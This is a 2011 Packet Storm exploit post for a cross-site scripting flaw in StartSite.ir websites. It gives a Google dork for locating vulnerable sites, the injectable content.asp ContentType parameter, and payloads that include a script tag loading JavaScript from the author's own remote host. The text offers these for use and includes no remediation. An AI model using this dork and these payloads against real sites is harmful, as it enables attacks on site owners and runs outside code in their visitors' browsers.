StartSite.ir Cross Site Scripting

2011-04-05T00:00:00
ID PACKETSTORM:100112
Type packetstorm
Reporter md.r00t
Modified 2011-04-05T00:00:00

Description

                                        
                                            `#------------In The Name Of God------------  
# StartSite.ir Cross-site Scripting Vulnerability  
###################################  
#AUTHOR: md.r00t  
#Mail: md.r00t.defacer@gmail.com  
#Website: www.r00t.gigfa.com  
#Forum: http://ajaxtm.com/forum  
###################################  
#Google D0rk:  
# "Powered by StartSite.ir"  
###################################  
# xss EXPLOIT:  
<script>alert(/0/)</script>  
<script src="http://md-r00t.persiangig.com/xpl/XSS1.JS"></script>  
######VULN IN HERE##################  
  
/content.asp?Catid=247&ContentType=<script>alert(/0/)</script>  
####################################  
#TNX:  
#Ajax Security Team,Aria-Security Team (Persian Security Network),hadihadi & black.shadowes(Virangar Security Team)  
*****************************************  
`